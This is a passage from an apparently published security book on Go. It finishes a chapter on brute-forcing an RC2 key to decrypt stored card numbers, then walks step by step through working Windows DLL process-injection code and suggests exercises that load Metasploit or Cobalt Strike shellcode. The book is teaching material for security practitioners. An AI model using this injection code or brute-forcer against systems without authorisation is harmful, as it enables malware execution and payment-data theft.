complete") } Listing 11-11: The RC2 main() function (/ch-11/rc2-brute/main.go) Your main() function decodes your ciphertext, represented as a hexa- decimal string u. Next, you create several variables v. First you create WaitGroup variables used for tracking both producer and consumer gorou- tines. You also define several uint64 values for tracking the minimum value in a 40-bit key space (0x0000000000), the maximum value in the key space (0xffffffffff), and the number of producers you intend to start, in this case 75. You use these values to calculate a step or range, which represents the number of keys each producer will iterate, since your intent is to dis- tribute these efforts uniformly across all your producers. You also create a *CryptoData work channel and a done signaling channel. You’ll pass these around to your producer and consumer functions. Since you’re doing basic integer math to calculate your step value for the producers, there’s a chance that you’ll lose some data if the key space size isn’t a multiple of the number of producers you’ll spin up. To account for this—and to avoid losing precision while converting to a floating-point number for use in a call to math.Ceil()—you check whether the maximum key (step * prods) is less than your maximum value for the entire key space (0xffffffffff) w. If it is, a handful of values in the key space won’t be accounted for. You simply increase your step value to account for this short- age. You initialize two variables, start and end, to maintain the beginning and ending offsets you can use to break apart the key space. The math to arrive at your offsets and step size isn’t precise by any means, and it could cause your code to search beyond the end of the maxi- mum allowable key space. However, you fix that within a for loop x used to start each of the producers. In the loop, you adjust your ending step value, end, should that value fall beyond the maximum allowed key space value. 前沿信安资讯阵地 公众号:i nf osrc 260 Chapter 11 Each iteration of the loop calls generate() y, your producer function, and passes to it the start (start) and end (end) key space offsets for which the producer will iterate. You also pass it your work and done channels, as well as your producer WaitGroup. After calling the function, you shift your start and end variables to account for the next range of key space that will be passed to a new producer. This is how you break up your key space into smaller, more digestible portions that the program can process concurrently, with- out overlapping efforts between goroutines. After your producers are spun up, you use a for loop to create your work- ers z. In this case, you’re creating 30 of them. For each iteration, you call your decrypt() function {, passing to it the ciphertext, the work channel, the done channel, and the consumer WaitGroup. This spins up your concurrent consumers, which begin to pull and process work as the producers create it. Iterating through the entire key space takes time. If you don’t handle things correctly, the main() function will assuredly exit before you discover a key or exhaust key space. So, you need to make sure the producers and consumers have adequate time to either iterate the entire key space or discover the correct key. This is where your WaitGroups come in. You call prodWg.Wait() | to block main() until the producers have completed their tasks. Recall that the producers have completed their tasks if they either exhaust the key space or explicitly cancel the process via the done channel. After this completes, you explicitly close the work channel so the consumers won’t deadlock continually while trying to read from it. Finally, you block main() again by calling consWg.Wait() } to give adequate time for the consum- ers in your WaitGroup to complete any remaining work in the work channel. Running the Program You’ve completed your program! If you run it, you should see the following output: $ go run main.go 2020/07/12 14:27:47 Starting producers... 2020/07/12 14:27:47 Producers started! 2020/07/12 14:27:47 Starting consumers... 2020/07/12 14:27:47 Consumers started! 2020/07/12 14:27:47 Now we wait... 2020/07/12 14:27:48 Card [4532651325506680] found using key [e612d0bbb6] 2020/07/12 14:27:48 Brute-force complete The program starts the producers and consumers and then waits for them to execute. When a card is found, the program displays the cleartext card and the key used to decrypt that card. Since we assume this key is the magical key for all cards, we interrupt execution prematurely and celebrate our success by painting a self-portrait (not shown). Of course, depending on the key value, brute-forcing on a home com- puter can take a significant amount of time—think days or even weeks. For the preceding sample run, we narrowed the key space to find the key more 前沿信安资讯阵地 公众号:i nf osrc Implementing and Attacking Cryptography 261 quickly. However, completely exhausting the key space on a 2016 MacBook Pro takes approximately seven days. Not too bad for a quick-and-dirty solu- tion running on a laptop. Summary Crypto is an important topic for security practitioners, even though the learning curve can be steep. This chapter covered symmetric and asym- metric crypto, hashing, password handling with bcrypt, message authenti- cation, mutual authentication, and brute-forcing RC2. In the next chapter, we’ll get into the nitty-gritty of attacking Microsoft Windows. 前沿信安资讯阵地 公众号:i nf osrc 前沿信安资讯阵地 公众号:i nf osrc 12 W IN DOW S S Y S T E M IN T E R AC T ION A N D A N A LY SI S There are countless ways of developing Microsoft Windows attacks—too many to cover in this chapter. Instead of discussing them all, we’ll introduce and investigate a few techniques that can help you attack Windows, whether initially or during your post-exploitation adventures. After discussing the Microsoft API documentation and some safety concerns, we’ll cover three topics. First, we’ll use Go’s core syscall package to interact with various system-level Windows APIs by performing a process injection. Second, we’ll explore Go’s core package for the Windows Portable Executable (PE) format and write a PE file format parser. Third, we’ll dis- cuss techniques for using C code with native Go code. You’ll need to know these applied techniques in order to build a novel Windows attack. The Windows API’s OpenProcess() Function In order to attack Windows, you need to understand the Windows API. Let’s explore the Windows API documentation by examining the OpenProcess() 前沿信安资讯阵地 公众号:i nf osrc 264 Chapter 12 function, used to obtain a handle on a remote process. You can find the OpenProcess() documentation at https://docs.microsoft.com/en-us/windows /desktop/api/processthreadsapi/nf-processthreadsapi-openprocess/. Figure 12-1 shows the function’s object property details. Figure 12-1: The Windows API object structure for OpenProcess() In this particular instance, we can see that the object looks very similar to a struct type in Go. However, the C++ struct field types don’t necessarily reconcile with Go types, and Microsoft data types don’t always match Go data types. The Windows data type definition reference, located at https://docs.microsoft .com/en-us/windows/desktop/WinProg/windows-data-types/, can be helpful when reconciling a Windows data type with Go’s respective data type. Table 12-1 covers the type conversion we’ll use in the process injection examples later in this chapter. Table 12-1: Mapping Windows Data Types to Go Data Types Windows data Type Go data type BOOLEAN byte BOOL int32 BYTE byte DWORD uint32 DWORD32 uint32 DWORD64 uint64 WORD uint16 HANDLE uintptr (unsigned integer pointer) LPVOID uintptr SIZE_T uintptr LPCVOID uintptr HMODULE uintptr LPCSTR uintptr LPDWORD uintptr 前沿信安资讯阵地 公众号:i nf osrc Windows System Interaction and Analysis 265 The Go documentation defines the uintptr data type as “an integer type that is large enough to hold the bit pattern of any pointer.” This is a special data type, as you’ll see when we discuss Go’s unsafe package and type con- versions later in “The unsafe.Pointer and uintptr Types” on page 266. For now, let’s finish walking through the Windows API documentation. Next, you should look at an object’s parameters; the Parameters section of the documentation provides details. For example, the first parameter, dwDesiredAccess, provides specifics regarding the level of access the process handle should possess. After that, the Return Value section defines expected values for both a successful and failed system call (Figure 12-2). Figure 12-2: The definition for the expected return value We’ll take advantage of a GetLastError error message when using the syscall package in our upcoming example code, although this will deviate from the standard error handling (such as if err != nil syntax) ever so slightly. Our last section of the Windows API document, Requirements, pro- vides important details, as shown in Figure 12-3. The last line defines the dynamic link library (DLL), which contains exportable functions (such as OpenProcess()) and will be necessary when we build out our Windows DLL module’s variable declarations. Said another way, we cannot call the rel- evant Windows API function from Go without knowing the appropriate Windows DLL module. This will become clearer as we progress into our upcoming process injection example. Figure 12-3: The Requirements section defines the library required to call the API. 前沿信安资讯阵地 公众号:i nf osrc 266 Chapter 12 The unsafe.Pointer and uintptr Types In dealing with the Go syscall package, we’ll most certainly need to step around Go’s type-safety protections. The reason is that we’ll need, for example, to establish shared memory structures and perform type conver- sions between Go and C. This section provides the groundwork you need in order to manipulate memory, but you should also explore Go’s official documentation further. We’ll bypass Go’s safety precautions by using Go’s unsafe package (men- tioned in Chapter 9), which contains operations that step around the type safety of Go programs. Go has laid out four fundamental guidelines to help us out: • A pointer value of any type can be converted to an unsafe.Pointer. • An unsafe.Pointer can be converted to a pointer value of any type. • A uintptr can be converted to an unsafe.Pointer. • An unsafe.Pointer can be converted to a uintptr. W A R N I N G Keep in mind that packages that import the unsafe package may not be portable, and that although Go typically ensures Go version 1 compatibility, using the unsafe pack- age breaks all guarantees of this. The uintptr type allows you to perform type conversion or arithmetic between native safe types, among other uses. Although uintptr is an integer type, it’s used extensively to represent a memory address. When used with type-safe pointers, Go’s native garbage collector will maintain relevant ref- erences at runtime. However, the situation changes when unsafe.Pointer is introduced. Recall that uintptr is essentially just an unsigned integer. If a pointer value is created using unsafe.Pointer and then assigned to uintptr, there’s no guarantee that Go’s garbage collector will maintain the integrity of the referenced memory location’s value. Figure 12-4 helps to further describe the issue. Go safe pointer Go unsafe pointer Memory 0x945000 Memory reclaimed 0x945000 unintptr unintptr 0x945000 Figure 12-4: A potentially dangerous pointer when using uintptr and unsafe.Pointer 前沿信安资讯阵地 公众号:i nf osrc Windows System Interaction and Analysis 267 The top half of the image depicts uintptr with a reference value to a Go type-safe pointer. As such, it will maintain its reference at runtime, along with austere garbage collection. The lower half of the image demonstrates that uintptr, although it references an unsafe.Pointer type, can be garbage collected, considering Go doesn’t preserve nor manage pointers to arbitrary data types. Listing 12-1 represents the issue. func state() { var onload = createEvents("onload") u var receive = createEvents("receive") v var success = createEvents("success") w mapEvents := make(map[string]interface{}) mapEvents["messageOnload"] = unsafe.Pointer(onload) mapEvents["messageReceive"] = unsafe.Pointer(receive) x mapEvents["messageSuccess"] = uintptr(unsafe.Pointer(success)) y //This line is safe – retains orginal value fmt.Println(*(*string)(mapEvents["messageReceive"].(unsafe.Pointer))) z //This line is unsafe – original value could be garbage collected fmt.Println(*(*string)(unsafe.Pointer(mapEvents["messageSuccess"].(uintptr)))) { } func createEvents(s string)| *string { return &s } Listing 12-1: Using uintptr both securely and insecurely with unsafe.Pointer This code listing could be someone’s attempt at creating a state machine, for example. It has three variables, assigned their respective pointer values of onload u, receive v, and success w by calling the createEvents() | function. We then create a map containing a key of type string along with a value of type interface{}. We use the interface{} type because it can receive dis- parate data types. In this case, we’ll use it to receive both unsafe.Pointer x and uintptr y values. At this point, you most likely have spotted the dangerous pieces of code. Although the mapEvents["messageRecieve"] map entry x is of type unsafe.Pointer, it still maintains its original reference to the receive v vari- able and will provide the same consistent output z as it did originally. Contrarily, the mapEvents["messageSuccess"] map entry y is of type uintptr. This means that as soon as the unsafe.Pointer value referencing the success variable is assigned to a uintptr type, the success variable w is free to be garbage collected. Again, uintptr is just a type holding a literal integer of a memory address, not a reference to a pointer. As a result, there’s no guar- antee that the expected output { will be produced, as the value may no longer be present. Is there a safe way to use uintptr with unsafe.Pointer? We can do so by taking advantage of runtime.Keepalive, which can prevent the garbage 前沿信安资讯阵地 公众号:i nf osrc 268 Chapter 12 collection of a variable. Let’s take a look at this by modifying our prior code block (Listing 12-2). func state() { var onload = createEvents("onload") var receive = createEvents("receive") var successu = createEvents("success") mapEvents := make(map[string]interface{}) mapEvents["messageOnload"] = unsafe.Pointer(onload) mapEvents["messageReceive"] = unsafe.Pointer(receive) mapEvents["messageSuccess"] = uintptr(unsafe.Pointer(success))v //This line is safe – retains orginal value fmt.Println(*(*string)(mapEvents["messageReceive"].(unsafe.Pointer))) //This line is unsafe – original value could be garbage collected fmt.Println(*(*string)(unsafe.Pointer(mapEvents["messageSuccess"].(uintptr)))) runtime.KeepAlive(success) w } func createEvents(s string) *string { return &s } Listing 12-2: Using the runtime.KeepAlive() function to prevent garbage collection of a variable Seriously, we’ve added only one small line of code w! This line, runtime .KeepAlive(success), tells the Go runtime to ensure that the success variable remains accessible until it’s explicitly released or the run state ends. This means that although the success variable u is stored as uintptr v, it can’t be garbage collected because of the explicit runtime.KeepAlive() directive. Be aware that the Go syscall package extensively uses uintptr(unsafe .Pointer()) throughout, and although certain functions, like syscall9(), have type safety through exception, not all the functions employ this. Further, as you hack about your own project code, you’ll almost certainly run into situations that warrant manipulating heap or stack memory in an unsafe manner. Performing Process Injection with the syscall Package Often, we need to inject our own code into a process. This may be because we want to gain remote command line access to a system (shell), or even debug a runtime application when the source code isn’t available. Understanding the mechanics of process injection will also help you perform more interesting tasks, such as loading memory-resident malware or hooking functions. Either way, this section demonstrates how to use Go to interact with the Microsoft Windows APIs in order to perform process injection. We’ll inject a payload stored on a disk into existing process memory. Figure 12-5 describes the over- all chain of events. 前沿信安资讯阵地 公众号:i nf osrc Windows System Interaction and Analysis 269 Origin process Victim process Attach to the victim process: OpenProcess() Allocate memory on the victim process: VirtualAllocEx() Write payload to victim process memory: WriteProcessMemory() Execute the payload on the victim process: CreateRemoteThread() Memory cave Payload location Executed payload Process handle 1 2 3 4 Figure 12-5: Basic process injection In step 1, we use the OpenProcess() Windows function to establish a pro- cess handle, along with the desired process access rights. This is a require- ment for process-level interaction, whether we’re dealing with a local or remote process. Once the requisite process handle has been obtained, we use it in step 2, along with the VirtualAllocEx() Windows function, to allocate virtual memory within the remote process. This is a requirement for loading byte-level code, such as shellcode or a DLL, into the remote processes’ memory. In step 3, we load byte-level code into memory by using the WriteProcess Memory() Windows function. At this point in the injection process, we, as attackers, get to decide how creative to be with our shellcode or DLL. This is also the place where you might need to inject debugging code when attempting to understand a running program. Finally, in step 4, we use the CreateRemoteThread() Windows function as a means to call a native exported Windows DLL function, such as Load LibraryA(), located in Kernel32.dll, so that we can execute the code previ- ously placed within the process by using WriteProcessMemory(). The four steps we just described provide a fundamental process injec- tion example. We’ll define a few additional files and functions within our overall process injection example that aren’t necessarily described here, although we’ll describe them in detail as we encounter them. 前沿信安资讯阵地 公众号:i nf osrc 270 Chapter 12 Defining the Windows DLLs and Assigning Variables The first step is to create the winmods file in Listing 12-3. (All the code list- ings at the root location of / exist under the provided github repo https:// github.com/blackhat-go/bhg/.) This file defines the native Windows DLL, which maintains exported system-level APIs, that we’ll call by using the Go syscall package. The winmods file contains declara tions and assignments of more Windows DLL module references than required for our sample project, but we’ll document them so that you can leverage those in more advanced injection code. import "syscall" var ( u ModKernel32 = syscall.NewLazyDLL("kernel32.dll") modUser32 = syscall.NewLazyDLL("user32.dll") modAdvapi32 = syscall.NewLazyDLL("Advapi32.dll") ProcOpenProcessToken = modAdvapi32.NewProc("GetProcessToken") ProcLookupPrivilegeValueW = modAdvapi32.NewProc("LookupPrivilegeValueW") ProcLookupPrivilegeNameW = modAdvapi32.NewProc("LookupPrivilegeNameW") ProcAdjustTokenPrivileges = modAdvapi32.NewProc("AdjustTokenPrivileges") ProcGetAsyncKeyState = modUser32.NewProc("GetAsyncKeyState") ProcVirtualAlloc = ModKernel32.NewProc("VirtualAlloc") ProcCreateThread = ModKernel32.NewProc("CreateThread") ProcWaitForSingleObject = ModKernel32.NewProc("WaitForSingleObject") ProcVirtualAllocEx = ModKernel32.NewProc("VirtualAllocEx") ProcVirtualFreeEx = ModKernel32.NewProc("VirtualFreeEx") ProcCreateRemoteThread = ModKernel32.NewProc("CreateRemoteThread") ProcGetLastError = ModKernel32.NewProc("GetLastError") ProcWriteProcessMemory = ModKernel32.NewProc("WriteProcessMemory") v ProcOpenProcess = ModKernel32.NewProc("OpenProcess") ProcGetCurrentProcess = ModKernel32.NewProc("GetCurrentProcess") ProcIsDebuggerPresent = ModKernel32.NewProc("IsDebuggerPresent") ProcGetProcAddress = ModKernel32.NewProc("GetProcAddress") ProcCloseHandle = ModKernel32.NewProc("CloseHandle") ProcGetExitCodeThread = ModKernel32.NewProc("GetExitCodeThread") ) Listing 12-3: The winmods file (/ch-12/procInjector /winsys/winmods.go) We use the NewLazyDLL() method to load the Kernel32 DLL u. Kernel32 manages much of the internal Windows process functionality, such as addressing, handling, memory allocation, and more. (It’s worth noting that, as of Go version 1.12.2, you can use a couple of new functions to better load DLLs and prevent system DLL hijacking attacks: LoadLibraryEx() and NewLazySystemDLL().) Before we can interact with the DLL, we must establish a variable that we can use in our code. We do this by calling module.NewProc for each API that we’ll need to use. At v, we call it against OpenProcess() and assign it to an exported variable called ProcOpenProcess. The use of OpenProcess() is 前沿信安资讯阵地 公众号:i nf osrc Windows System Interaction and Analysis 271 arbitrary; it’s intended to demonstrate the technique for assigning any exported Windows DLL function to a descriptive variable name. Obtaining a Process Token with the OpenProcess Windows API Next, we build out the OpenProcessHandle() function, which we’ll use to obtain a process handle token. We will likely use the terms token and handle interchangeably throughout the code, but realize that every process within a Windows system has a unique process token. This provides a means to enforce relevant security models, such as Mandatory Integrity Control, a com- plex security model (and one that is worth investigating in order to get more acquainted with process-level mechanics). The security models consist of such items as process-level rights and privileges, for example, and dictate how both unprivileged and elevated processes can interact with one another. First, let’s take a look at the C++ OpenProcess() data structure as defined within the Window API documentation (Listing 12-4). We’ll define this object as if we intended to call it from native Windows C++ code. However, we won’t be doing this, because we’ll be defining this object to be used with Go’s syscall package. Therefore, we’ll need to translate this object to stan- dard Go data types. HANDLE OpenProcess( DWORDu dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId ); Listing 12-4: An arbitrary Windows C++ object and data types The first necessary task is to translate DWORD u to a usable type that Go maintains. A DWORD is defined by Microsoft as a 32-bit unsigned integer, which corresponds to Go’s uint32 type. The DWORD value states that it must contain dwDesiredAccess or, as the documentation states, “one or more of the process access rights.” Process access rights define the actions we wish to take upon a process, given a valid process token. We want to declare a variety of process access rights. Since these values won’t change, we place such relevant values in a Go constants file, as shown in Listing 12-5. Each line in this list defines a process access right. The list contains almost every available process access right, but we will use only the ones necessary for obtaining a process handle. const ( // docs.microsoft.com/en-us/windows/desktop/ProcThread/process-security-and-access-rights PROCESS_CREATE_PROCESS = 0x0080 PROCESS_CREATE_THREAD = 0x0002 PROCESS_DUP_HANDLE = 0x0040 PROCESS_QUERY_INFORMATION = 0x0400 PROCESS_QUERY_LIMITED_INFORMATION = 0x1000 PROCESS_SET_INFORMATION = 0x0200 PROCESS_SET_QUOTA = 0x0100 PROCESS_SUSPEND_RESUME = 0x0800 前沿信安资讯阵地 公众号:i nf osrc 272 Chapter 12 PROCESS_TERMINATE = 0x0001 PROCESS_VM_OPERATION = 0x0008 PROCESS_VM_READ = 0x0010 PROCESS_VM_WRITE = 0x0020 PROCESS_ALL_ACCESS = 0x001F0FFF ) Listing 12-5: A constants section declaring process access rights (/ch-12 /procInjector/winsys/constants.go) All the process access rights we defined in Listing 12-5 reconcile with their respective constant hexadecimal values, which is the format they need to be in to assign them to a Go variable. One issue that we’d like to describe prior to reviewing Listing 12-6 is that most of the following process injection functions, not just OpenProcessHandle(), will consume a custom object of type Inject and return a value of type error. The Inject struct object (Listing 12-6) will contain various values that will be provided to the relevant Windows function via syscall. type Inject struct { Pid uint32 DllPath string DLLSize uint32 Privilege string RemoteProcHandle uintptr Lpaddr uintptr LoadLibAddr uintptr RThread uintptr Token TOKEN } type TOKEN struct { tokenHandle syscall.Token } Listing 12-6: The Inject struct used to hold certain process injection data types (/ch-12 /procInjector/winsys/models.go) Listing 12-7 illustrates our first actual function, OpenProcessHandle(). Let’s take a look at the following code block and discuss the various details. func OpenProcessHandle(i *Inject) error { u var rights uint32 = PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ v var inheritHandle uint32 = 0 w var processID uint32 = i.Pid x remoteProcHandle, _, lastErry := ProcOpenProcess.Callz( uintptr(rights), // DWORD dwDesiredAccess uintptr(inheritHandle), // BOOL bInheritHandle uintptr(processID)) // DWORD dwProcessId if remoteProcHandle == 0 { return errors.Wrap(lastErr, `[!] ERROR : 前沿信安资讯阵地 公众号:i nf osrc Windows System Interaction and Analysis 273 Can't Open Remote Process. Maybe running w elevated integrity?`) } i.RemoteProcHandle = remoteProcHandle fmt.Printf("[-] Input PID: %v\n", i.Pid) fmt.Printf("[-] Input DLL: %v\n", i.DllPath) fmt.Printf("[+] Process handle: %v\n", unsafe.Pointer(i.RemoteProcHandle)) return nil } Listing 12-7: The OpenProcessHandle() function used to obtain a process handle (/ch-12 /procInjector/winsys/inject.go) The code starts by assigning process access rights to the uint32 variable called rights u. The actual values assigned include PROCESS_CREATE_THREAD, which allows us to create a thread on our remote process. Following that is PROCESS_QUERY_INFORMAITON, which gives us the ability to generically query details about the remote process. The last three process access rights, PROCESS_VM_OPERATION, PROCESS_VM_WRITE, and PROCESS_VM_READ, all provide the access rights to manage the remote process virtual memory. The next declared variable, inheritHandle v, dictates whether our new process handle will inherit the existing handle. We pass in 0 to indicate a Boolean false value, as we want a new process handle. Immediately following is the processID w variable containing the PID of the victim process. All the while, we reconcile our variable types with the Windows API documentation, such that both our declared variables are of type uint32. This pattern contin- ues until we make the system call by using ProcOpenProcess.Call() z. The .Call() method consumes a varying number of uintptr values, which, if we were to look at the Call() function signature, would be declared literally as …uintptr. Additionally, the return types are designated as uintptr x and error y. Further, the error type is named lastErr y, which you’ll find refer- enced in the Windows API documentation, and contains the returned error value as defined by the actual called function. Manipulating Memory with the VirtualAllocEx Windows API Now that we have a remote process handle, we need a means to allocate virtual memory within the remote process. This is necessary in order to set aside a region of memory and initialize it prior to writing to it. Let’s build that out now. Place the function defined in Listing 12-8 immediately after the function defined in Listing 12-7. (We will continue to append functions, one after another, as we navigate the process injection code.) func VirtualAllocEx(i *Inject) error { var flAllocationType uint32 = MEM_COMMIT | MEM_RESERVE var flProtect uint32 = PAGE_EXECUTE_READWRITE lpBaseAddress, _, lastErr := ProcVirtualAllocEx.Call( i.RemoteProcHandle, // HANDLE hProcess uintptr(nullRef), // LPVOID lpAddress u uintptr(i.DLLSize), // SIZE_T dwSize uintptr(flAllocationType), // DWORD flAllocationType // https://docs.microsoft.com/en-us/windows/desktop/Memory/memory-protection-constants 前沿信安资讯阵地 公众号:i nf osrc 274 Chapter 12 uintptr(flProtect)) // DWORD flProtect if lpBaseAddress == 0 { return errors.Wrap(lastErr, "[!] ERROR : Can't Allocate Memory On Remote Process.") } i.Lpaddr = lpBaseAddress fmt.Printf("[+] Base memory address: %v\n", unsafe.Pointer(i.Lpaddr)) return nil } Listing 12-8: Allocating a region of memory in the remote process via VirtualAllocEx (/ch-12/procInjector /winsys/inject.go) Unlike the previous OpenProcess() system call, we introduce a new detail via the nullRef variable u. The nil keyword is reserved by Go for all null intents. However, it’s a typed value, which means that passing it directly via a syscall without a type will result in either a runtime error or a type- conversion error—either way, a bad situation. The fix is simple in this case: we declare a variable that resolves to a 0 value, such as an integer. The 0 value can now be reliably passed and interpreted as a null value by the receiving Windows function. Writing to Memory with the WriteProcessMemory Windows API Next, we’ll use the WriteProcessMemory() function to write to the remote pro- cess’s memory region previously initialized using the VirtualAllocEx() func- tion. In Listing 12-9, we’ll keep things simple by calling a DLL by file path, rather than writing the entire DLL code into memory. func WriteProcessMemory(i *Inject) error { var nBytesWritten *byte dllPathBytes, err := syscall.BytePtrFromString(i.DllPath) u if err != nil { return err } writeMem, _, lastErr := ProcWriteProcessMemory.Call( i.RemoteProcHandle, // HANDLE hProcess i.Lpaddr, // LPVOID lpBaseAddress uintptr(unsafe.Pointer(dllPathBytes)), // LPCVOID lpBuffer v uintptr(i.DLLSize), // SIZE_T nSize uintptr(unsafe.Pointer(nBytesWritten))) // SIZE_T *lpNumberOfBytesWritten if writeMem == 0 { return errors.Wrap(lastErr, "[!] ERROR : Can't write to process memory.") } return nil } Listing 12-9: Writing the DLL file path to remote process memory (/ch-12 /procInjector/winsys/inject.go) The first noticeable syscall function is BytePtrFromString() u, which is a convenience function that consumes a string and returns the base index-0 pointer location of a byte slice, which we’ll assign to dllPathBytes. Finally, we get to see unsafe.Pointer in action. The third argument to the ProcWriteProcessMemory.Call is defined within the Windows API specification 前沿信安资讯阵地 公众号:i nf osrc Windows System Interaction and Analysis 275 as “lpBuffer—a pointer to the buffer that contains data to be written in the address space of the specified process.” In order to pass the Go pointer value defined in dllPathBytes over to the receiving Windows function, we use unsafe.Pointer to circumvent type conversions. One final point to make here is that uintptr and unsafe.Pointer v are acceptably safe, since both are being used inline and without the intent of assigning the return value to a vari- able for later reuse. Finding LoadLibraryA with the GetProcessAddress Windows API Kernel32.dll exports a function called LoadLibraryA(), which is available on all Windows versions. Microsoft documentation states that LoadLibraryA() “loads the specified module into the address space of the calling process. The specified module may cause other modules to be loaded.” We need to obtain the memory location of LoadLibraryA() before creating a remote thread necessary to execute our actual process injection. We can do this with the GetLoadLibAddress() function—one of those supporting functions mentioned earlier (Listing 12-10). func GetLoadLibAddress(i *Inject) error { var llibBytePtr *byte llibBytePtr, err := syscall.BytePtrFromString("LoadLibraryA") u if err != nil { return err } lladdr, _, lastErr := ProcGetProcAddress.Callv( ModKernel32.Handle(), // HMODULE hModule w uintptr(unsafe.Pointer(llibBytePtr))) // LPCSTR lpProcName x if &lladdr == nil { return errors.Wrap(lastErr, "[!] ERROR : Can't get process address.") } i.LoadLibAddr = lladdr fmt.Printf("[+] Kernel32.Dll memory address: %v\n", unsafe.Pointer(ModKernel32.Handle())) fmt.Printf("[+] Loader memory address: %v\n", unsafe.Pointer(i.LoadLibAddr)) return nil } Listing 12-10: Obtaining the LoadLibraryA() memory address by using the GetProcessAddress() Windows function (/ch-12/procInjector/winsys/inject.go) We use the GetProcessAddress() Windows function to identify the base memory address of LoadLibraryA() necessary to call the CreateRemoteThread() function. The ProcGetProcAddress.Call() v function takes two arguments: the first is a handle to Kernel32.dll w that contains the exported function we’re interested in (LoadLibraryA()), and the second is the base index-0 pointer loca- tion x of a byte slice returned from the literal string "LoadLibraryA" u. Executing the Malicious DLL Using the CreateRemoteThread Windows API We’ll use the CreateRemoteThread() Windows function to create a thread against the remote process’ virtual memory region. If that region happens 前沿信安资讯阵地 公众号:i nf osrc 276 Chapter 12 to be LoadLibraryA(), we now have a means to load and execute the region of memory containing the file path to our malicious DLL. Let’s review the code in Listing 12-11. func CreateRemoteThread(i *Inject) error { var threadId uint32 = 0 var dwCreationFlags uint32 = 0 remoteThread, _, lastErr := ProcCreateRemoteThread.Callu( i.RemoteProcHandle, // HANDLE hProcess v uintptr(nullRef), // LPSECURITY_ATTRIBUTES lpThreadAttributes uintptr(nullRef), // SIZE_T dwStackSize i.LoadLibAddr, // LPTHREAD_START_ROUTINE lpStartAddress w i.Lpaddr, // LPVOID lpParameter x uintptr(dwCreationFlags), // DWORD dwCreationFlags uintptr(unsafe.Pointer(&threadId)), // LPDWORD lpThreadId ) if remoteThread == 0 { return errors.Wrap(lastErr, "[!] ERROR : Can't Create Remote Thread.") } i.RThread = remoteThread fmt.Printf("[+] Thread identifier created: %v\n", unsafe.Pointer(&threadId)) fmt.Printf("[+] Thread handle created: %v\n", unsafe.Pointer(i.RThread)) return nil } Listing 12-11: Executing the process injection by using the CreateRemoteThread() Windows function (/ch-12 /procInjector/winsys/inject.go) The ProcCreateRemoteThread.Call() u function takes a total of seven arguments, although we’ll use only three of them in this example. The relevant arguments are RemoteProcHandle v containing the victim process’s handle, LoadLibAddr w containing the start routine to be called by the thread (in this case, LoadLibraryA()), and, lastly, the pointer x to the virtually allocated memory holding the payload location. Verifying Injection with the WaitforSingleObject Windows API We’ll use the WaitforSingleObject() Windows function to identify when a particular object is in a signaled state. This is relevant to process injection because we want to wait for our thread to execute in order to avoid bailing out prematurely. Let’s briefly discuss the function definition in Listing 12-12. func WaitForSingleObject(i *Inject) error { var dwMilliseconds uint32 = INFINITE var dwExitCode uint32 rWaitValue, _, lastErr := ProcWaitForSingleObject.Call( u i.RThread, // HANDLE hHandle uintptr(dwMilliseconds)) // DWORD dwMilliseconds if rWaitValue != 0 { return errors.Wrap(lastErr, "[!] ERROR : Error returning thread wait state.") } success, _, lastErr := ProcGetExitCodeThread.Call( v 前沿信安资讯阵地 公众号:i nf osrc Windows System Interaction and Analysis 277 i.RThread, // HANDLE hThread uintptr(unsafe.Pointer(&dwExitCode))) // LPDWORD lpExitCode if success == 0 { return errors.Wrap(lastErr, "[!] ERROR : Error returning thread exit code.") } closed, _, lastErr := ProcCloseHandle.Call(i.RThread) // HANDLE hObject w if closed == 0 { return errors.Wrap(lastErr, "[!] ERROR : Error closing thread handle.") } return nil } Listing 12-12: Using the WaitforSingleObject() Windows function to ensure successful thread execution (/ch-12/procInjector/winsys/inject.go) Three notable events are occurring in this code block. First, the ProcWaitForSingleObject.Call() system call u is passed the thread handle returned in Listing 12-11. A wait value of INFINITE is passed as the second argument to declare an infinite expiration time associated with the event. Next, ProcGetExitCodeThread.Call() v determines whether the thread terminated successfully. If it did, the LoadLibraryA function should have been called, and our DLL will have been executed. Finally, as we do for the responsible cleanup of almost any handle, we passed the ProcCloseHandle .Call() system call w so that that thread object handle closes cleanly. Cleaning Up with the VirtualFreeEx Windows API We use the VirtualFreeEx() Windows function to release, or decommit, the virtual memory that we allocated in Listing 12-8 via VirtualAllocEx(). This is necessary to clean up memory responsibly, since initialized memory regions can be rather large, considering the overall size of the code being injected into the remote process, such as an entire DLL. Let’s take a look at this block of code (Listing 12-13). func VirtualFreeEx(i *Inject) error { var dwFreeType uint32 = MEM_RELEASE var size uint32 = 0 //Size must be 0 to MEM_RELEASE all of the region rFreeValue, _, lastErr := ProcVirtualFreeEx.Callu( i.RemoteProcHandle, // HANDLE hProcess v i.Lpaddr, // LPVOID lpAddress w uintptr(size), // SIZE_T dwSize x uintptr(dwFreeType)) // DWORD dwFreeType y if rFreeValue == 0 { return errors.Wrap(lastErr, "[!] ERROR : Error freeing process memory.") } fmt.Println("[+] Success: Freed memory region") return nil } Listing 12-13: Freeing virtual memory by using the VirtualFreeEx() Windows function (/ch-12/procInjector /winsys/inject.go) 前沿信安资讯阵地 公众号:i nf osrc 278 Chapter 12 The ProcVirtualFreeEx.Call() function u takes four arguments. The first is the remote process handle v associated with the process that is to have its memory freed. The next argument is a pointer w to the location of memory to be freed. Notice that a variable named size x is assigned a 0 value. This is nec- essary, as defined within the Windows API specification, to release the entire region of memory back into a reclaimable state. Finally, we pass the MEM_RELEASE operation y to completely free the process memory (and our discussion on process injection). Additional Exercises Like many of the other chapters in this book, this chapter will provide the most value if you code and experiment along the way. Therefore, we con- clude this section with a few challenges or possibilities to expand upon the ideas already covered: • One of the most important aspects of creating code injection is main- taining a usable tool chain sufficient for inspecting and debugging process execution. Download and install both the Process Hacker and Process Monitor tools. Then, using Process Hacker, locate the memory addresses of both Kernel32 and LoadLibrary. While you’re at it, locate the process handle and take a look at the integrity level, along with inher- ent privileges. Now inject your code into the same victim process and locate the thread. • You can expand the process injection example to be less trivial. For example, instead of loading the payload from a disk file path, use MsfVenom or Cobalt Strike to generate shellcode and load it directly into process memory. This will require you to modify VirtualAllocEx and LoadLibrary. • Create a DLL and load the entire contents into memory. This is simi- lar to the previous exercise: the exception is that you’ll be loading an entire DLL rather than shellcode. Use Process Monitor to set a path filter, process filter, or both, and observe the system DLL load order. What prevents DLL load order hijacking? • You can use a project called Frida (https://www.frida.re/) to inject the Google Chrome V8 JavaScript engine into the victim process. It has a 